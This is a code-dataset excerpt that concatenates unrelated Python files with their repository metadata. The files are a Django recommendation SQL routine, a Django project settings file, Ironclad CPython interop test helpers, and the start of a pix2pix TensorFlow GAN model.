user_id = %%s)' % params, ], params=[content_type.id, user.id, min_score, user.id, user.id] ).distinct() return objects def update_recommendations(self): from djangoratings.models import Vote from django.db import connection, DatabaseError cursor = connection.cursor() cursor.execute('BEGIN') try: cursor.execute('TRUNCATE TABLE %s' % (self.model._meta.db_table,)) except DatabaseError: cursor.execute('DELETE FROM %s' % (self.model._meta.db_table,)) cursor.execute("""INSERT INTO %(t1)s (to_user_id, from_user_id, agrees, disagrees, exclude) SELECT v1.user_id, v2.user_id, SUM(if(v2.score = v1.score, 1, 0)) AS agrees, SUM(if(v2.score != v1.score, 1, 0)) AS disagrees, 0 FROM %(t2)s AS v1 INNER JOIN %(t2)s AS v2 ON v1.user_id != v2.user_id AND v1.object_id = v2.object_id AND v1.content_type_id = v2.content_type_id WHERE v1.user_id is not null AND v2.user_id is not null GROUP BY v1.user_id, v2.user_id HAVING agrees / (disagrees + 0.0001) > 3 ON DUPLICATE KEY UPDATE agrees=values(agrees), disagrees=values(disagrees);""" % dict( t1=self.model._meta.db_table, t2=Vote._meta.db_table, )) cursor.execute('commit') cursor.close()
true
true
f705d6c189996ed6849395984a8050289ed6a38d
3,224
py
Python
django_tdd/settings.py
migueleichler/django-tdd
5b8bd6088b5e2de4d70026b761391bce3aa52f32
[ "MIT" ]
null
null
null
django_tdd/settings.py
migueleichler/django-tdd
5b8bd6088b5e2de4d70026b761391bce3aa52f32
[ "MIT" ]
null
null
null
django_tdd/settings.py
migueleichler/django-tdd
5b8bd6088b5e2de4d70026b761391bce3aa52f32
[ "MIT" ]
null
null
null
""" Django settings for django_tdd project. Generated by 'django-admin startproject' using Django 1.9.12. For more information on this file, see https://docs.djangoproject.com/en/1.9/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.9/ref/settings/ """ import os # Build paths inside the project like this: os.path.join(BASE_DIR, ...) BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'axh7uu^+yfch=#hjgozv%trd3ai55m%xb83=39o4n-y#gk$y6o' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'agenda', 'test_without_migrations', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'django_tdd.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'django_tdd.wsgi.application' # Database # https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/'
26
91
0.700682
import os BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) SECRET_KEY = 'axh7uu^+yfch=#hjgozv%trd3ai55m%xb83=39o4n-y#gk$y6o' DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'agenda', 'test_without_migrations', ] MIDDLEWARE_CLASSES = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.auth.middleware.SessionAuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'django_tdd.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'django_tdd.wsgi.application' # Database # https://docs.djangoproject.com/en/1.9/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # Password validation # https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/1.9/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.9/howto/static-files/ STATIC_URL = '/static/'
true
true
f705d6ce7500355546b594150038c8315daf1d0a
9,140
py
Python
tests/utils/cpython.py
netcharm/ironclad
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
[ "PSF-2.0" ]
null
null
null
tests/utils/cpython.py
netcharm/ironclad
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
[ "PSF-2.0" ]
null
null
null
tests/utils/cpython.py
netcharm/ironclad
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
[ "PSF-2.0" ]
null
null
null
from System import IntPtr from System.Runtime.InteropServices import Marshal import Ironclad from Ironclad import CPyMarshal from Ironclad.Structs import METH, Py_TPFLAGS, PyGetSetDef, PyMemberDef, PyMethodDef, PyTypeObject from tests.utils.memory import OffsetPtr def _new_struct(type_, fields, *values): struct = type_() for field, value in zip(fields, values): getattr(type_, field).SetValue(struct, value) return struct _meth_fields = 'ml_name ml_meth ml_flags ml_doc'.split() new_PyMethodDef = lambda *args: _new_struct(PyMethodDef, _meth_fields, *args) _getset_fields = 'name get set doc closure'.split() new_PyGetSetDef = lambda *args: _new_struct(PyGetSetDef, _getset_fields, *args) _member_fields = 'name type offset flags doc'.split() new_PyMemberDef = lambda *args: _new_struct(PyMemberDef, _member_fields, *args) gc_fooler = [] def GC_NotYet(dgt): gc_fooler.append(dgt) def GC_Soon(): gc_fooler.remove(dgt) return GC_Soon DELEGATE_TYPES = { METH.OLDARGS: Ironclad.dgt_ptr_ptrptr, METH.O: Ironclad.dgt_ptr_ptrptr, METH.NOARGS: Ironclad.dgt_ptr_ptrptr, METH.VARARGS: Ironclad.dgt_ptr_ptrptr, METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr, METH.VARARGS | METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr, } for (k, v) in DELEGATE_TYPES.items(): DELEGATE_TYPES[k | METH.COEXIST] = v def MakeMethodDef(name, implementation, flags, doc="doc"): dgt = DELEGATE_TYPES[flags](implementation) return new_PyMethodDef(name, Marshal.GetFunctionPointerForDelegate(dgt), int(flags), doc), GC_NotYet(dgt) def MakeGetSetDef(name, get, set, doc, closure=IntPtr.Zero): deallocs = [] _get = IntPtr.Zero if get: getdgt = Ironclad.dgt_ptr_ptrptr(get) _get = Marshal.GetFunctionPointerForDelegate(getdgt) deallocs.append(GC_NotYet(getdgt)) _set = IntPtr.Zero if set: setdgt = Ironclad.dgt_int_ptrptrptr(set) _set = Marshal.GetFunctionPointerForDelegate(setdgt) deallocs.append(GC_NotYet(setdgt)) return new_PyGetSetDef(name, _get, _set, doc, closure), lambda: map(apply, deallocs) def MakeMemberDef(name, type_, offset, flags, doc="doc"): return new_PyMemberDef(name, int(type_), offset, flags, doc), lambda: None MAKETYPEPTR_DEFAULTS = { "tp_name": "Nemo", "tp_doc": "Odysseus' reply to the blinded Cyclops", "ob_refcnt": 1, "tp_basicsize": 8, "tp_itemsize": 4, "tp_flags": Py_TPFLAGS.HAVE_CLASS, "tp_methods": None, "tp_members": None, "tp_getset": None, "tp_init": None, "tp_iter": None, "tp_iternext": None, "tp_base": IntPtr.Zero, "tp_bases": IntPtr.Zero, "tp_as_number": IntPtr.Zero, } def GetMapperTypePtrDefaults(mapper): return { "ob_type": mapper.PyType_Type, "tp_alloc": mapper.PyType_GenericAlloc, "tp_new": mapper.PyType_GenericNew, "tp_dealloc": mapper.IC_PyBaseObject_Dealloc, "tp_free": mapper.PyObject_Free, } PTR_ARGS = ("ob_type", "tp_base", "tp_bases", "tp_as_number", "tp_as_sequence", "tp_as_mapping") INT_ARGS = ("ob_refcnt", "tp_basicsize", "tp_itemsize", "tp_flags") STRING_ARGS = ("tp_name", "tp_doc") TABLE_ARGS = ("tp_methods", "tp_members", "tp_getset") FUNC_ARGS = { "tp_alloc": Ironclad.dgt_ptr_ptrint, "tp_new": Ironclad.dgt_ptr_ptrptrptr, "tp_init": Ironclad.dgt_int_ptrptrptr, "tp_dealloc": Ironclad.dgt_void_ptr, "tp_free": Ironclad.dgt_void_ptr, "tp_getattr": Ironclad.dgt_ptr_ptrstr, "tp_iter": Ironclad.dgt_ptr_ptr, "tp_iternext": Ironclad.dgt_ptr_ptr, "tp_call": Ironclad.dgt_ptr_ptrptrptr, "tp_str": Ironclad.dgt_ptr_ptr, "tp_repr": Ironclad.dgt_ptr_ptr, "tp_richcompare": Ironclad.dgt_ptr_ptrptrint, "tp_compare": Ironclad.dgt_int_ptrptr, "tp_hash": Ironclad.dgt_int_ptr, } def WriteTypeField(typePtr, name, value): if name in PTR_ARGS: CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, value) return lambda: None if name in INT_ARGS: CPyMarshal.WriteIntField(typePtr, PyTypeObject, name, int(value)) return lambda: None if name in STRING_ARGS: ptr = Marshal.StringToHGlobalAnsi(value) CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr) return lambda: Marshal.FreeHGlobal(ptr) if name in TABLE_ARGS: ptr, dealloc = MakeItemsTablePtr(value) CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr) return dealloc if name in FUNC_ARGS: if value is not None: dgt = FUNC_ARGS[name](value) CPyMarshal.WriteFunctionPtrField(typePtr, PyTypeObject, name, dgt) return GC_NotYet(dgt) return lambda: None raise KeyError("WriteTypeField can't handle %s, %s" % (name, value)) def MakeTypePtr(mapper, params, allocator=None): fields = dict(MAKETYPEPTR_DEFAULTS) fields.update(GetMapperTypePtrDefaults(mapper)) fields.update(params) deallocs = [] typeSize = Marshal.SizeOf(PyTypeObject) if allocator: # pretend this was constructed by a C extension, using the mapper's allocator # hence mapper should do the deallocation itself typePtr = allocator.Alloc(typeSize) else: typePtr = Marshal.AllocHGlobal(typeSize) deallocs.append(lambda: Marshal.FreeHGlobal(typePtr)) CPyMarshal.Zero(typePtr, typeSize) for field, value in fields.items(): deallocs.append(WriteTypeField(typePtr, field, value)) def dealloc(): for f in deallocs: f() return typePtr, dealloc def MakeItemsTablePtr(items): if not items: return IntPtr.Zero, lambda: None itemtype = items[0].__class__ typesize = Marshal.SizeOf(itemtype) size = typesize * (len(items) + 1) tablePtr = Marshal.AllocHGlobal(size) CPyMarshal.Zero(tablePtr, size) for i, item in enumerate(items): Marshal.StructureToPtr(item, OffsetPtr(tablePtr, typesize * i), False) def dealloc(): Marshal.DestroyStructure(tablePtr, itemtype) Marshal.FreeHGlobal(tablePtr) return tablePtr, dealloc NUMSEQMAP_METHODS = { "nb_negative": Ironclad.dgt_ptr_ptr, "nb_positive": Ironclad.dgt_ptr_ptr, "nb_absolute": Ironclad.dgt_ptr_ptr, "nb_invert": Ironclad.dgt_ptr_ptr, "nb_int": Ironclad.dgt_ptr_ptr, "nb_long": Ironclad.dgt_ptr_ptr, "nb_float": Ironclad.dgt_ptr_ptr, "nb_oct": Ironclad.dgt_ptr_ptr, "nb_hex": Ironclad.dgt_ptr_ptr, "nb_index": Ironclad.dgt_ptr_ptr, "nb_add": Ironclad.dgt_ptr_ptrptr, "nb_subtract": Ironclad.dgt_ptr_ptrptr, "nb_multiply": Ironclad.dgt_ptr_ptrptr, "nb_divide": Ironclad.dgt_ptr_ptrptr, "nb_floor_divide": Ironclad.dgt_ptr_ptrptr, "nb_true_divide": Ironclad.dgt_ptr_ptrptr, "nb_remainder": Ironclad.dgt_ptr_ptrptr, "nb_divmod": Ironclad.dgt_ptr_ptrptr, "nb_lshift": Ironclad.dgt_ptr_ptrptr, "nb_rshift": Ironclad.dgt_ptr_ptrptr, "nb_and": Ironclad.dgt_ptr_ptrptr, "nb_xor": Ironclad.dgt_ptr_ptrptr, "nb_or": Ironclad.dgt_ptr_ptrptr, "nb_inplace_add": Ironclad.dgt_ptr_ptrptr, "nb_inplace_subtract": Ironclad.dgt_ptr_ptrptr, "nb_inplace_multiply": Ironclad.dgt_ptr_ptrptr, "nb_inplace_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_floor_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_true_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_remainder": Ironclad.dgt_ptr_ptrptr, "nb_inplace_lshift": Ironclad.dgt_ptr_ptrptr, "nb_inplace_rshift": Ironclad.dgt_ptr_ptrptr, "nb_inplace_and": Ironclad.dgt_ptr_ptrptr, "nb_inplace_xor": Ironclad.dgt_ptr_ptrptr, "nb_inplace_or": Ironclad.dgt_ptr_ptrptr, "nb_nonzero": Ironclad.dgt_int_ptr, "nb_power": Ironclad.dgt_ptr_ptrptrptr, "nb_inplace_power": Ironclad.dgt_ptr_ptrptrptr, "sq_item": Ironclad.dgt_ptr_ptrint, "sq_concat": Ironclad.dgt_ptr_ptrptr, "sq_repeat": Ironclad.dgt_ptr_ptrint, "sq_slice": Ironclad.dgt_ptr_ptrintint, "sq_ass_item": Ironclad.dgt_int_ptrintptr, "sq_ass_slice": Ironclad.dgt_int_ptrintintptr, "sq_length": Ironclad.dgt_int_ptr, "sq_contains": Ironclad.dgt_int_ptrptr, "mp_length": Ironclad.dgt_int_ptr, "mp_subscript": Ironclad.dgt_ptr_ptrptr, "mp_ass_subscript": Ironclad.dgt_int_ptrptrptr, } def MakeNumSeqMapMethods(_type, slots): size = Marshal.SizeOf(_type) ptr = Marshal.AllocHGlobal(size) CPyMarshal.Zero(ptr, size) deallocs = [] for (slot, func) in slots.items(): dgt = NUMSEQMAP_METHODS[slot](func) CPyMarshal.WriteFunctionPtrField(ptr, _type, slot, dgt) deallocs.append(GC_NotYet(dgt)) def dealloc(): for f in deallocs: f() Marshal.FreeHGlobal(ptr) return ptr, dealloc
35.426357
110
0.67954
from System import IntPtr from System.Runtime.InteropServices import Marshal import Ironclad from Ironclad import CPyMarshal from Ironclad.Structs import METH, Py_TPFLAGS, PyGetSetDef, PyMemberDef, PyMethodDef, PyTypeObject from tests.utils.memory import OffsetPtr def _new_struct(type_, fields, *values): struct = type_() for field, value in zip(fields, values): getattr(type_, field).SetValue(struct, value) return struct _meth_fields = 'ml_name ml_meth ml_flags ml_doc'.split() new_PyMethodDef = lambda *args: _new_struct(PyMethodDef, _meth_fields, *args) _getset_fields = 'name get set doc closure'.split() new_PyGetSetDef = lambda *args: _new_struct(PyGetSetDef, _getset_fields, *args) _member_fields = 'name type offset flags doc'.split() new_PyMemberDef = lambda *args: _new_struct(PyMemberDef, _member_fields, *args) gc_fooler = [] def GC_NotYet(dgt): gc_fooler.append(dgt) def GC_Soon(): gc_fooler.remove(dgt) return GC_Soon DELEGATE_TYPES = { METH.OLDARGS: Ironclad.dgt_ptr_ptrptr, METH.O: Ironclad.dgt_ptr_ptrptr, METH.NOARGS: Ironclad.dgt_ptr_ptrptr, METH.VARARGS: Ironclad.dgt_ptr_ptrptr, METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr, METH.VARARGS | METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr, } for (k, v) in DELEGATE_TYPES.items(): DELEGATE_TYPES[k | METH.COEXIST] = v def MakeMethodDef(name, implementation, flags, doc="doc"): dgt = DELEGATE_TYPES[flags](implementation) return new_PyMethodDef(name, Marshal.GetFunctionPointerForDelegate(dgt), int(flags), doc), GC_NotYet(dgt) def MakeGetSetDef(name, get, set, doc, closure=IntPtr.Zero): deallocs = [] _get = IntPtr.Zero if get: getdgt = Ironclad.dgt_ptr_ptrptr(get) _get = Marshal.GetFunctionPointerForDelegate(getdgt) deallocs.append(GC_NotYet(getdgt)) _set = IntPtr.Zero if set: setdgt = Ironclad.dgt_int_ptrptrptr(set) _set = Marshal.GetFunctionPointerForDelegate(setdgt) deallocs.append(GC_NotYet(setdgt)) return new_PyGetSetDef(name, _get, _set, doc, closure), lambda: map(apply, deallocs) def MakeMemberDef(name, type_, offset, flags, doc="doc"): return new_PyMemberDef(name, int(type_), offset, flags, doc), lambda: None MAKETYPEPTR_DEFAULTS = { "tp_name": "Nemo", "tp_doc": "Odysseus' reply to the blinded Cyclops", "ob_refcnt": 1, "tp_basicsize": 8, "tp_itemsize": 4, "tp_flags": Py_TPFLAGS.HAVE_CLASS, "tp_methods": None, "tp_members": None, "tp_getset": None, "tp_init": None, "tp_iter": None, "tp_iternext": None, "tp_base": IntPtr.Zero, "tp_bases": IntPtr.Zero, "tp_as_number": IntPtr.Zero, } def GetMapperTypePtrDefaults(mapper): return { "ob_type": mapper.PyType_Type, "tp_alloc": mapper.PyType_GenericAlloc, "tp_new": mapper.PyType_GenericNew, "tp_dealloc": mapper.IC_PyBaseObject_Dealloc, "tp_free": mapper.PyObject_Free, } PTR_ARGS = ("ob_type", "tp_base", "tp_bases", "tp_as_number", "tp_as_sequence", "tp_as_mapping") INT_ARGS = ("ob_refcnt", "tp_basicsize", "tp_itemsize", "tp_flags") STRING_ARGS = ("tp_name", "tp_doc") TABLE_ARGS = ("tp_methods", "tp_members", "tp_getset") FUNC_ARGS = { "tp_alloc": Ironclad.dgt_ptr_ptrint, "tp_new": Ironclad.dgt_ptr_ptrptrptr, "tp_init": Ironclad.dgt_int_ptrptrptr, "tp_dealloc": Ironclad.dgt_void_ptr, "tp_free": Ironclad.dgt_void_ptr, "tp_getattr": Ironclad.dgt_ptr_ptrstr, "tp_iter": Ironclad.dgt_ptr_ptr, "tp_iternext": Ironclad.dgt_ptr_ptr, "tp_call": Ironclad.dgt_ptr_ptrptrptr, "tp_str": Ironclad.dgt_ptr_ptr, "tp_repr": Ironclad.dgt_ptr_ptr, "tp_richcompare": Ironclad.dgt_ptr_ptrptrint, "tp_compare": Ironclad.dgt_int_ptrptr, "tp_hash": Ironclad.dgt_int_ptr, } def WriteTypeField(typePtr, name, value): if name in PTR_ARGS: CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, value) return lambda: None if name in INT_ARGS: CPyMarshal.WriteIntField(typePtr, PyTypeObject, name, int(value)) return lambda: None if name in STRING_ARGS: ptr = Marshal.StringToHGlobalAnsi(value) CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr) return lambda: Marshal.FreeHGlobal(ptr) if name in TABLE_ARGS: ptr, dealloc = MakeItemsTablePtr(value) CPyMarshal.WritePtrField(typePtr, PyTypeObject, name, ptr) return dealloc if name in FUNC_ARGS: if value is not None: dgt = FUNC_ARGS[name](value) CPyMarshal.WriteFunctionPtrField(typePtr, PyTypeObject, name, dgt) return GC_NotYet(dgt) return lambda: None raise KeyError("WriteTypeField can't handle %s, %s" % (name, value)) def MakeTypePtr(mapper, params, allocator=None): fields = dict(MAKETYPEPTR_DEFAULTS) fields.update(GetMapperTypePtrDefaults(mapper)) fields.update(params) deallocs = [] typeSize = Marshal.SizeOf(PyTypeObject) if allocator: # hence mapper should do the deallocation itself typePtr = allocator.Alloc(typeSize) else: typePtr = Marshal.AllocHGlobal(typeSize) deallocs.append(lambda: Marshal.FreeHGlobal(typePtr)) CPyMarshal.Zero(typePtr, typeSize) for field, value in fields.items(): deallocs.append(WriteTypeField(typePtr, field, value)) def dealloc(): for f in deallocs: f() return typePtr, dealloc def MakeItemsTablePtr(items): if not items: return IntPtr.Zero, lambda: None itemtype = items[0].__class__ typesize = Marshal.SizeOf(itemtype) size = typesize * (len(items) + 1) tablePtr = Marshal.AllocHGlobal(size) CPyMarshal.Zero(tablePtr, size) for i, item in enumerate(items): Marshal.StructureToPtr(item, OffsetPtr(tablePtr, typesize * i), False) def dealloc(): Marshal.DestroyStructure(tablePtr, itemtype) Marshal.FreeHGlobal(tablePtr) return tablePtr, dealloc NUMSEQMAP_METHODS = { "nb_negative": Ironclad.dgt_ptr_ptr, "nb_positive": Ironclad.dgt_ptr_ptr, "nb_absolute": Ironclad.dgt_ptr_ptr, "nb_invert": Ironclad.dgt_ptr_ptr, "nb_int": Ironclad.dgt_ptr_ptr, "nb_long": Ironclad.dgt_ptr_ptr, "nb_float": Ironclad.dgt_ptr_ptr, "nb_oct": Ironclad.dgt_ptr_ptr, "nb_hex": Ironclad.dgt_ptr_ptr, "nb_index": Ironclad.dgt_ptr_ptr, "nb_add": Ironclad.dgt_ptr_ptrptr, "nb_subtract": Ironclad.dgt_ptr_ptrptr, "nb_multiply": Ironclad.dgt_ptr_ptrptr, "nb_divide": Ironclad.dgt_ptr_ptrptr, "nb_floor_divide": Ironclad.dgt_ptr_ptrptr, "nb_true_divide": Ironclad.dgt_ptr_ptrptr, "nb_remainder": Ironclad.dgt_ptr_ptrptr, "nb_divmod": Ironclad.dgt_ptr_ptrptr, "nb_lshift": Ironclad.dgt_ptr_ptrptr, "nb_rshift": Ironclad.dgt_ptr_ptrptr, "nb_and": Ironclad.dgt_ptr_ptrptr, "nb_xor": Ironclad.dgt_ptr_ptrptr, "nb_or": Ironclad.dgt_ptr_ptrptr, "nb_inplace_add": Ironclad.dgt_ptr_ptrptr, "nb_inplace_subtract": Ironclad.dgt_ptr_ptrptr, "nb_inplace_multiply": Ironclad.dgt_ptr_ptrptr, "nb_inplace_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_floor_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_true_divide": Ironclad.dgt_ptr_ptrptr, "nb_inplace_remainder": Ironclad.dgt_ptr_ptrptr, "nb_inplace_lshift": Ironclad.dgt_ptr_ptrptr, "nb_inplace_rshift": Ironclad.dgt_ptr_ptrptr, "nb_inplace_and": Ironclad.dgt_ptr_ptrptr, "nb_inplace_xor": Ironclad.dgt_ptr_ptrptr, "nb_inplace_or": Ironclad.dgt_ptr_ptrptr, "nb_nonzero": Ironclad.dgt_int_ptr, "nb_power": Ironclad.dgt_ptr_ptrptrptr, "nb_inplace_power": Ironclad.dgt_ptr_ptrptrptr, "sq_item": Ironclad.dgt_ptr_ptrint, "sq_concat": Ironclad.dgt_ptr_ptrptr, "sq_repeat": Ironclad.dgt_ptr_ptrint, "sq_slice": Ironclad.dgt_ptr_ptrintint, "sq_ass_item": Ironclad.dgt_int_ptrintptr, "sq_ass_slice": Ironclad.dgt_int_ptrintintptr, "sq_length": Ironclad.dgt_int_ptr, "sq_contains": Ironclad.dgt_int_ptrptr, "mp_length": Ironclad.dgt_int_ptr, "mp_subscript": Ironclad.dgt_ptr_ptrptr, "mp_ass_subscript": Ironclad.dgt_int_ptrptrptr, } def MakeNumSeqMapMethods(_type, slots): size = Marshal.SizeOf(_type) ptr = Marshal.AllocHGlobal(size) CPyMarshal.Zero(ptr, size) deallocs = [] for (slot, func) in slots.items(): dgt = NUMSEQMAP_METHODS[slot](func) CPyMarshal.WriteFunctionPtrField(ptr, _type, slot, dgt) deallocs.append(GC_NotYet(dgt)) def dealloc(): for f in deallocs: f() Marshal.FreeHGlobal(ptr) return ptr, dealloc
true
true
f705d6e28e10770948eaf92986fd5dda9272df1d
19,432
py
Python
model.py
UrusuLambda/pix2pix-tensorflow
9b1e832494f8b8b36ad2d0331cb5feda5bd65ce0
[ "MIT" ]
1,014
2016-11-25T14:03:59.000Z
2022-03-26T14:57:07.000Z
model.py
Chediak/pix2pix-tensorflow
ba40020706ad3a1fbefa1da7bc7a05b7b031fb9e
[ "MIT" ]
35
2016-11-27T14:31:40.000Z
2020-10-19T15:37:14.000Z
model.py
Chediak/pix2pix-tensorflow
ba40020706ad3a1fbefa1da7bc7a05b7b031fb9e
[ "MIT" ]
349
2016-11-25T15:50:09.000Z
2022-02-28T21:16:21.000Z
from __future__ import division import os import time from glob import glob import tensorflow as tf import numpy as np from six.moves import xrange from ops import * from utils import * class pix2pix(object): def __init__(self, sess, image_size=256, batch_size=1, sample_size=1, output_size=256, gf_dim=64, df_dim=64, L1_lambda=100, input_c_dim=3, output_c_dim=3, dataset_name='facades', checkpoint_dir=None, sample_dir=None): """ Args: sess: TensorFlow session batch_size: The size of batch. Should be specified before training. output_size: (optional) The resolution in pixels of the images. [256] gf_dim: (optional) Dimension of gen filters in first conv layer. [64] df_dim: (optional) Dimension of discrim filters in first conv layer. [64] input_c_dim: (optional) Dimension of input image color. For grayscale input, set to 1. [3] output_c_dim: (optional) Dimension of output image color. For grayscale input, set to 1. [3] """ self.sess = sess self.is_grayscale = (input_c_dim == 1) self.batch_size = batch_size self.image_size = image_size self.sample_size = sample_size self.output_size = output_size self.gf_dim = gf_dim self.df_dim = df_dim self.input_c_dim = input_c_dim self.output_c_dim = output_c_dim self.L1_lambda = L1_lambda # batch normalization : deals with poor initialization helps gradient flow self.d_bn1 = batch_norm(name='d_bn1') self.d_bn2 = batch_norm(name='d_bn2') self.d_bn3 = batch_norm(name='d_bn3') self.g_bn_e2 = batch_norm(name='g_bn_e2') self.g_bn_e3 = batch_norm(name='g_bn_e3') self.g_bn_e4 = batch_norm(name='g_bn_e4') self.g_bn_e5 = batch_norm(name='g_bn_e5') self.g_bn_e6 = batch_norm(name='g_bn_e6') self.g_bn_e7 = batch_norm(name='g_bn_e7') self.g_bn_e8 = batch_norm(name='g_bn_e8') self.g_bn_d1 = batch_norm(name='g_bn_d1') self.g_bn_d2 = batch_norm(name='g_bn_d2') self.g_bn_d3 = batch_norm(name='g_bn_d3') self.g_bn_d4 = batch_norm(name='g_bn_d4') self.g_bn_d5 = batch_norm(name='g_bn_d5') self.g_bn_d6 = batch_norm(name='g_bn_d6') self.g_bn_d7 = batch_norm(name='g_bn_d7') self.dataset_name = dataset_name self.checkpoint_dir = checkpoint_dir self.build_model() def build_model(self): self.real_data = tf.placeholder(tf.float32, [self.batch_size, self.image_size, self.image_size, self.input_c_dim + self.output_c_dim], name='real_A_and_B_images') self.real_B = self.real_data[:, :, :, :self.input_c_dim] self.real_A = self.real_data[:, :, :, self.input_c_dim:self.input_c_dim + self.output_c_dim] self.fake_B = self.generator(self.real_A) self.real_AB = tf.concat([self.real_A, self.real_B], 3) self.fake_AB = tf.concat([self.real_A, self.fake_B], 3) self.D, self.D_logits = self.discriminator(self.real_AB, reuse=False) self.D_, self.D_logits_ = self.discriminator(self.fake_AB, reuse=True) self.fake_B_sample = self.sampler(self.real_A) self.d_sum = tf.summary.histogram("d", self.D) self.d__sum = tf.summary.histogram("d_", self.D_) self.fake_B_sum = tf.summary.image("fake_B", self.fake_B) self.d_loss_real = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits, labels=tf.ones_like(self.D))) self.d_loss_fake = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.zeros_like(self.D_))) self.g_loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=self.D_logits_, labels=tf.ones_like(self.D_))) \ + self.L1_lambda * tf.reduce_mean(tf.abs(self.real_B - self.fake_B)) self.d_loss_real_sum = tf.summary.scalar("d_loss_real", self.d_loss_real) self.d_loss_fake_sum = tf.summary.scalar("d_loss_fake", self.d_loss_fake) self.d_loss = self.d_loss_real + self.d_loss_fake self.g_loss_sum = tf.summary.scalar("g_loss", self.g_loss) self.d_loss_sum = tf.summary.scalar("d_loss", self.d_loss) t_vars = tf.trainable_variables() self.d_vars = [var for var in t_vars if 'd_' in var.name] self.g_vars = [var for var in t_vars if 'g_' in var.name] self.saver = tf.train.Saver() def load_random_samples(self): data = np.random.choice(glob('./datasets/{}/val/*.jpg'.format(self.dataset_name)), self.batch_size) sample = [load_data(sample_file) for sample_file in data] if (self.is_grayscale): sample_images = np.array(sample).astype(np.float32)[:, :, :, None] else: sample_images = np.array(sample).astype(np.float32) return sample_images def sample_model(self, 